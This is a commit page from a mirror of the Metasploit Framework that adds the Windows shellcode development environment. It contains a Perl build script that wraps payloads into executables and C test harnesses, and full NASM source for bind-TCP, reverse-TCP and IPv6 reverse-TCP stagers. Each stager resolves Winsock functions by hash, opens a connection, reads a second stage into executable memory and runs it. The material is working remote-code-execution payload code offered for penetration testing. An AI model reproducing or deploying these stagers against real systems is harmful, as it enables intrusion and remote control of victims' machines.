infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated README, include the templates and other src 

git-svn-id: file:///home/svn/framework3/trunk@5637 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-08-22 18:45:33 +00:00
parent ed379dddf5
commit 7d2bb9536a
17 changed files with 15964 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
external/source/shellcode/windows/README vendored
View File

@ -1,7 +1,7 @@
This directory contains the win32 payload development environment used This directory contains the win32 payload development environment used
for creating the payloads in version 3 of the Metasploit Framework. for creating the payloads in version 3 of the Metasploit Framework.
The 'nasm' executable must be in your path to use the included build tool. The 'nasm' executable must be in your path to use the included build.sh tool.
The included 'build' script automatically creates a number of file types The included 'build' script automatically creates a number of file types
each time it used to compile a payload. These file types are: each time it used to compile a payload. These file types are:
@ -13,6 +13,6 @@ each time it used to compile a payload. These file types are:
The PE executable templates were developed by 'rix' and used with permission. The PE executable templates were developed by 'rix' and used with permission.
To use this script, simply run ./build <name of payload>, where the name To use this script, simply run ./build.sh <name of payload>, where the name
does not include the ".asm" suffix. To build win32_stage_api.asm, the does not include the ".asm" suffix. To build win32_stage_api.asm, the
command line would be "./build win32_stage_api". command line would be "./build.sh win32_stage_api".

173
external/source/shellcode/windows/build.sh vendored Executable file
View File

@ -0,0 +1,173 @@
#!/usr/bin/perl
###############
##
# Name: build
# Author: H D Moore <hdm [at] metasploit.com>
# Description: Command-line tool for building/extracting asm payloads
# License: GPL / Perl Artistic
##
my $name = shift();
if (! $name || $name =~ /\./) { print STDERR "Usage: $0 <name>\n"; exit(0); }
if ($name eq 'clean') {
system("rm -f *.bin *.exe *.c *.elf");
exit(0);
}
# Compile the asm
unlink("$name.bin");
system("nasm -f bin -O3 -o $name.bin $name.asm");
if (! -f "$name.bin") {
exit(0);
}
# Load binary
my $bindata;
open(X, "<$name.bin") || exit(0);
$bindata = join('',<X>);
close(X);
print "# Length: " . length($bindata) . " bytes\n";
# Print out common offsets into the payload data
my $suffix;
my $port = index($bindata, pack("n", 8721));
if ($port != -1) {
print "# Port: $port\n";
}
my $host = index($bindata, gethostbyname("127.0.0.1"));
if ($host != -1) {
print "# Host: $host\n";
}
my $psize = index($bindata, pack("L", 0x12345678));
if ($psize != -1) {
print "# Size: $psize\n";
}
my $pstart = index($bindata, pack("L", 0x13370000));
if ($pstart != -1) {
print "# Start: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x11223344));
if ($pstart != -1) {
print "# Alloc: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x73e2d87e));
if ($pstart != -1) {
print "# ExitProcess: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x4cf079fa));
if ($pstart != -1) {
print "# PayloadLen: $pstart\n";
}
my $pstart = index($bindata, "\x8d\x77\x15");
if ($pstart != -1) {
$pstart+=2;
print "# FileStart: $pstart\n";
}
my $pstart = index($bindata, "\x88\x4f\x1a");
if ($pstart != -1) {
$pstart+=2;
print "# FileEnd: $pstart\n";
}
my $pstart = index($bindata, "http");
if ($pstart != -1) {
print "# URL Start: $pstart\n";
}
$x = BufferPerl($bindata);
print $x;
$x = BufferC($bindata);
my $cfile;
while(<DATA>) { $cfile .= $_; }
$cfile =~ s/::SHELLCODE::/$x/g;
open(C, ">$name.c");
print C $cfile;
close (C);
# Build PE
open (X, ">templates/payload.bin") || die "payload.bin: $!";
print X $bindata;
close (X);
chdir("templates") || die "chdir(templates): $!";
unlink("../$name.exe");
system("nasm -I inc/ -f bin -o ../$name.exe win32_template.asm");
# Build ELF
unlink("linux_template.o");
system("nasm -f elf -o linux_template.o linux_template.asm");
if (-f "linux_template.o")
{
system("ld -o ../$name.elf linux_template.o");
unlink("linux_template.o");
}
unlink("payload.bin");
system("chmod 755 *.exe *.elf");
sub BufferPerl
{
my ($data, $width) = @_;
my ($res, $count);
if (! $data) { return }
if (! $width) { $width = 16 }
$res = '"';
$count = 0;
foreach my $char (split(//, $data))
{
if ($count == $width)
{
$res .= '".' . "\n" . '"';
$count = 0;
}
$res .= sprintf("\\x%.2x", ord($char));
$count++;
}
if ($count) { $res .= '";' . "\n"; }
return $res;
}
sub BufferC
{
my ($data, $width) = @_;
my $res = BufferPerl($data, $width);
if (! $res) { return }
$res =~ s/\.//g;
return $res;
}
__DATA__
char code[] =
::SHELLCODE::
int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) code;
(int)(*funct)();
}

203
external/source/shellcode/windows/stager_bind_tcp_nx.asm vendored Normal file
View File

@ -0,0 +1,203 @@
; Title: Win32 API Loader
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_ACCEPT [ebp + 32]
%define FN_BIND [ebp + 36]
%define FN_LISTEN [ebp + 40]
%define FN_WSASOCK [ebp + 44]
%define FN_WSASTART [ebp + 48]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x498649e5 ; accept [ebp + 32]
dd 0xc7701aa4 ; bind [ebp + 36]
dd 0xe92eada4 ; listen [ebp + 40]
dd 0xadf509d9 ; WSASocketA [ebp + 44]
dd 0x3bfcedcb ; WSAStartup [ebp + 48]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x07 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x101, DATA)
sub esp, [edi]
push esp
push dword [edi]
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call FN_WSASOCK
mov edi, eax
LBind:
xor ebx, ebx
push ebx
push ebx
push dword 0x11220002 ; port 8721
mov eax, esp
push byte 0x10 ; length
push eax
push edi
call FN_BIND
LListen:
push ebx
push edi
call FN_LISTEN
LAccept:
push ebx
push esp
push edi
call FN_ACCEPT
mov edi, eax
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push 4096 ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx

255
external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm vendored Normal file
View File

@ -0,0 +1,255 @@
; Title: Windows Reverse Connect Stager (NX, IPv6)
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
; Author: Metasploit LLC
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push dword 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
LBootWinsock:
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_CONNECT [ebp + 32]
%define FN_WSASOCK [ebp + 36]
%define FN_WSASTART [ebp + 40]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x60aaf9ec ; connect [ebp + 32]
dd 0xadf509d9 ; WSASocketA [ebp + 36]
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x05 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x0202, DATA)
sub esp, [edi]
push esp
push dword 0x0202
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (23,1,6,0,0,0)
; dwFlags
push eax
; RESERVED
push eax
; PROTOCOL INFO
push eax
; PROTOCOL: IPPROTO_TCP
push byte 6
; TYPE: SOCK_STREAM
push byte 1
; FAMILY: AF_INET6
push byte 23
; WSASocket()
call FN_WSASOCK
mov edi, eax
; [ebp + 0] = kernel32.dll base
; [ebp + 4] = LGetProcAddress
; [ebp + 8] = LoadLibraryA
; [ebp + 12] = VirtualAlloc
; [ebp + 24] = recv
; [ebp + 28] = send
; [ebp + 32] = accept
; [ebp + 36] = bind
; [ebp + 40] = connect
; [ebp + 44] = WSASocketA
; [ebp + 48] = WSAStartup
; [ebp + 52] = Payload Length
LConnect:
call LGotAddress
LGetAddress:
; struct sockaddr_in6 {
; short sin6_family;
; u_short sin6_port;
; u_long sin6_flowinfo;
; struct in6_addr sin6_addr;
; u_long sin6_scope_id;
;}
; sin6_family
db 0x17
db 0x00
; sin6_port
db 0xff
db 0xff
dd 0x00000000 ; sin6_flowinfo
; fe80000000000000021b63fffe98bf36
db 0xfe
db 0x80
db 0x00
db 0x00
db 0x00
db 0x00
db 0x00
db 0x00
db 0x02
db 0x1b
db 0x63
db 0xff
db 0xfe
db 0x98
db 0xbf
db 0x36
dd 0x00000000 ; sin6_scope_id
LGotAddress:
pop ecx
push byte 28 ; address length
push ecx
push dword edi
call dword FN_CONNECT
; reconnect on failure
; test eax, eax
; jne short LConnect
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push esi ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx

203
external/source/shellcode/windows/stager_reverse_tcp_nx.asm vendored Normal file
View File

@ -0,0 +1,203 @@
; Title: Win32 API Loader
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista,
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
LBootWinsock:
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_CONNECT [ebp + 32]
%define FN_WSASOCK [ebp + 36]
%define FN_WSASTART [ebp + 40]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x60aaf9ec ; connect [ebp + 32]
dd 0xadf509d9 ; WSASocketA [ebp + 36]
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x05 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x101, DATA)
sub esp, [edi]
push esp
push dword [edi]
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call FN_WSASOCK
mov edi, eax
; [ebp + 0] = kernel32.dll base
; [ebp + 4] = LGetProcAddress
; [ebp + 8] = LoadLibraryA
; [ebp + 12] = VirtualAlloc
; [ebp + 24] = recv
; [ebp + 28] = send
; [ebp + 32] = accept
; [ebp + 36] = bind
; [ebp + 40] = connect
; [ebp + 44] = WSASocketA
; [ebp + 48] = WSAStartup
; [ebp + 52] = Payload Length
LConnect:
push 0x0100007f ; host: 127.0.0.1
push 0x11220002 ; port: 8721
mov ecx, esp
push byte 0x10
push ecx
push dword edi
call dword FN_CONNECT
; reconnect on failure
; test eax, eax
; jne short LConnect
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push esi ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx

3
external/source/shellcode/windows/templates/inc/README vendored Normal file
View File

@ -0,0 +1,3 @@
These include files were pulled from rix's site:
http://www.devhell.org/~rix/

1109
external/source/shellcode/windows/templates/inc/byte.inc vendored Normal file
View File

File diff suppressed because it is too large Load Diff

309
external/source/shellcode/windows/templates/inc/function.inc vendored Normal file
View File

@ -0,0 +1,309 @@
; MACROS FOR FUNCTION DECLARATIONS v0.9a
; ======================================
;gérer les appels de fonctions externes C (linux)
;return() ?
;FUNCTION.INC_CONVENTION = C|Std = convention d'appel des fonctions par défaut
;FunctionDefine alias,C|Std|Pascal [,adresse]
; -> FunctionDefine_alias = C|Std|Pascal
; @alias = adresse de la fonction
; alias$ (si aucun paramètre)
; alias([p1,...]) (si plusieurs paramètres)
;Function alias, [,p1,...]
; <- FunctionDefine
; -> @alias = adresse de la fonction
; Function_EBP ebp
; Function_EIP byte ebp+4
;[FunctionResd nom,nombre d]
;[FunctionResw nom,nombre w]
;[FunctionResb nom,nombre b]
;...
;FunctionBegin
; <- Sub
; ...
;FunctionEnd
; <- FUNCTION.INC_CONVENTION,BYTE.INC_NO_00
;FunctionCall alias, [,p1,...]
; <- Push,Call,BYTE.INC_TEMPORARY_REGISTER(push & pop C)
;================================= General ===================================
%ifndef _FUNCTION.INC
%define _FUNCTION.INC
%include "byte.inc"
%macro FUNCTION.INC 0
BYTE.INC
%define FUNCTION.INC_CONVENTION C
%endmacro
%macro FUNCTION.INC~ 0
BYTE.INC~
%define FUNCTION.INC_CONVENTION C
%endmacro
FUNCTION.INC
%macro FunctionDefine 2-3
%define FunctionDefine_%1 %2
%if %0==3
%ifnidni %3,@%1
%define @%1 %3
%endif
%endif
%define %1$ FunctionCall %1
%define %1(p1) FunctionCall %1,p1
%define %1(p1,p2) FunctionCall %1,p1,p2
%define %1(p1,p2,p3) FunctionCall %1,p1,p2,p3
%define %1(p1,p2,p3,p4) FunctionCall %1,p1,p2,p3,p4
%define %1(p1,p2,p3,p4,p5) FunctionCall %1,p1,p2,p3,p4,p5
%define %1(p1,p2,p3,p4,p5,p6) FunctionCall %1,p1,p2,p3,p4,p5,p6
%define %1(p1,p2,p3,p4,p5,p6,p7) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7
%define %1(p1,p2,p3,p4,p5,p6,p7,p8) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20
%endmacro
;================================= Function ==================================
%macro Function 1-*
FUNCTION.INC~
%ifndef Function_%1
%ifctx Function
Error FUNCTION,Function =X=> Function
%else
%push Function
%define Function_%1
%define Function_Name_Define @%1
%ifndef BYTE.INC_NO_00
%define Function_EBP byte ebp
%endif
%define Function_EIP byte ebp+4
FunctionDefine %1,FUNCTION.INC_CONVENTION
%assign Function_Params_Assign 4
%if %0>1
%rotate 1
%rep %0-1
%assign Function_Params_Assign Function_Params_Assign+4
%1_Equ equ Function_Params_Assign
%define %1 byte ebp+%1_Equ
%rotate 1
%endrep
%endif
%assign Function_Locals_Assign 0
%endif
%undef Function_Exist_Define
%else
%define Function_Exist_Define
%endif
%endmacro
%macro FunctionResd 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2*4
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResd %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResd => Function
%endif
%endif
%endmacro
%macro FunctionResw 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2*2
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResw %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResw => Function
%endif
%endif
%endmacro
%macro FunctionResb 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResb %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResb => Function
%endif
%endif
%endmacro
%macro FunctionBegin 0
%ifndef Function_Exist_Define
%ifctx Function
Function_Name_Define:
%define BYTE.INC_TEMPORARY_REGISTER eax
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
push ebp
mov ebp,esp
%endif
%if Function_Locals_Assign>0
Sub esp,Function_Locals_Assign
%endif
; enter Function_Locals_Assign,0
%undef BYTE.INC_TEMPORARY_REGISTER
%else
Error FUNCTION,FunctionBegin => Function
%endif
%endif
%endmacro
%macro FunctionEnd 0
%ifndef Function_Exist_Define
%ifctx Function
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
leave
%endif
%ifnidni FUNCTION.INC_CONVENTION,C
%if Function_Params_Assign==4
ret
%elifndef BYTE.INC_NO_00
ret Function_Params_Assign-4
%else
Error FUNCTION,NO_00 =X=> CONVENTION Std
%endif
%else
ret
%endif
%undef Function_Name_Define
%pop
%else
Error FUNCTION,FunctionEnd => Function
%endif
%endif
%undef Function_Exist_Define
FUNCTION.INC~
%endmacro
;=================================== Call ====================================
%macro FunctionCallStd 1-*
%define BYTE.INC_TEMPORARY_REGISTER eax
%rep %0-1
%rotate -1
Push %1
%endrep
Call FunctionCall_Address_Define
%undef BYTE.INC_TEMPORARY_REGISTER
%endmacro
%macro FunctionCallPascal 1-*
%define BYTE.INC_TEMPORARY_REGISTER eax
%rep %0-1
%rotate 1
Push %1
%endrep
Call FunctionCall_Address_Define
%undef BYTE.INC_TEMPORARY_REGISTER
%endmacro
%macro FunctionCallC 1-*
%ifndef BYTE.INC_NO_00
%define BYTE.INC_TEMPORARY_REGISTER eax
%else
%ifdef BYTE.INC_TEMPORARY_REGISTER
%ifidni BYTE.INC_TEMPORARY_REGISTER,eax
Error FUNCTION,NO_00 => TEMPORARY_REGISTER <> eax
%endif
%else
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
%endif
%endif
%rep %0-1
%rotate -1
Push %1
%endrep
Call FunctionCall_Address_Define
%if %0>1
%ifndef BYTE.INC_NO_00
%assign FunctionCallC_Assign (%0-1)*4
add esp,FunctionCallC_Assign
%undef BYTE.INC_TEMPORARY_REGISTER
%else
%ifdef BYTE.INC_TEMPORARY_REGISTER
%rep %0-1
pop BYTE.INC_TEMPORARY_REGISTER
%endrep
%else
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
%endif
%endif
%endif
%endmacro
;FunctionCall nom fonction [,p1,...]
%macro FunctionCall 1-2+
%ifdef FunctionDefine_%1
%define FunctionCall_Address_Define @%1
%ifidni FunctionDefine_%1,Std
%if %0==1
FunctionCallStd %1
%else
FunctionCallStd %1,%2
%endif
%elifidni FunctionDefine_%1,Pascal
%if %0==1
FunctionCallPascal %1
%else
FunctionCallPascal %1,%2
%endif
%else
%if %0==1
FunctionCallC %1
%else
FunctionCallC %1,%2
%endif
%endif
%undef FunctionCall_Address_Define
%else
%if %0==1
Error FUNCTION,FunctionCall %1
%else
Error FUNCTION,FunctionCall %1,%2
%endif
%endif
%endmacro
%endif

328
external/source/shellcode/windows/templates/inc/language.inc vendored Normal file
View File

@ -0,0 +1,328 @@
; MACROS FOR STRUCTURATED PROGRAMMING v0.9a
; =========================================
;Continue
;Break
;IfJmp {valeur1},condition,valeur2,l [,-1|+1]
;IfNotJmp {valeur1},condition,valeur2,l [,-1|+1]
;If {valeur1},condition,valeur2
;IfX condition asm
; ...
;[Else]
; [...]
;EndIf
;Switch v
;Case v1
;...
;[Default]
; [...]
;EndSwitch
; les conditions Case sont évaluées juste avant leur exécution, à la
; différence du C !!!
;While [{valeur1},condition,valeur2]
; ...
;EndWhile [{valeur1},condition,valeur2]
;Until [{valeur1},condition,valeur2]
; ...
;EndUntil [{valeur1},condition,valeur2]
;For compteur,valeur_début,condition,valeur_fin,valeur_incrément
; ...
;EndFor
;================================= General ===================================
%ifndef _LANGUAGE.INC
%define _LANGUAGE.INC
%include "byte.inc"
;============================= Continue-Break ================================
%macro Continue 0
%ifdef %$BeginEnd
Jmp %$Begin,-1
%elifdef %$$BeginEnd
Jmp %$$Begin,-1
%elifdef %$$$BeginEnd
Jmp %$$$Begin,-1
%elifdef %$$$$BeginEnd
Jmp %$$$$Begin,-1
%elifdef %$$$$$BeginEnd
